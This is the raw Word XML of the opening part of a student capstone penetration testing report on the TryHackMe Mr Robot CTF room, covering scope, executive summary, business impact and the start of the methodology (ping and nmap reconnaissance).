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1E6B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Capstone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Penetration Testing Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B92C9B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78CED2A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Target</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 xml:space="preserve">Mr Robot CTF (TryHackMe)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712145C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Official Room Link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: https://tryhackme.com/room/mrrobot  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C1BE77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24513DD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Student Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADESEYE NELSON OLAIYAPO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D85D2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D3C93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Instructor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EDUARDO COCHELLA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA9558">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38101E5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E413F83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="063952F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA9B49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B4BCC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This penetration test was conducted against the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mr Robot CTF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hosted on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TryHackMe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>to simulate a real-world web application and server compromise scenario. The primary objective was to identify security weaknesses, assess their potential impact, and demonstrate realistic attack paths from an external attacker’s perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B967BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79816DA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Scope of Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D0AC4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13720911">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In-Scope Target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: Mr Robot CTF (TryHackMe room)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A136A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Testing Type</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Black-box style CTF engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA1880">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Focus Areas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: Web application, underlying services, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell (shell), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>privilege escalation paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E03F668">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00CFB1C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Overall Risk Rating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: HIGH  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D9437F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Number of Vulnerabilities Identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFD23CA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F19E06D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Business Impact Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD4F6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2318CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>If the identified vulnerabilities were present in a real production environment, an attacker could:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C551BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="612A858D">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Gain unauthorized access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">to sensitive data and system files  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE363AC">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Obtain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a reverse shell back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686C87C9">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Escalate privileges to root, resulting in full system compromise  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9F847C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B66F17">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>These issues would significantly impact confidentiality, integrity, and availability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>of the affected system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6B6E6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D06DA1D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0191DAC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F5359A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2515CCBB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The assessment followed a structured penetration testing approach, aligned with common industry practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F9208">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280777E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.1 Information Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B13629B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35ECEA86">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Identified target IP address from TryHackMe environment  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B243F">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Performed basic connectivity checks (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’</w:t>
      </w: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nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>host discovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D535F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Collected initial banners and HTTP responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174133AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E8BB82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
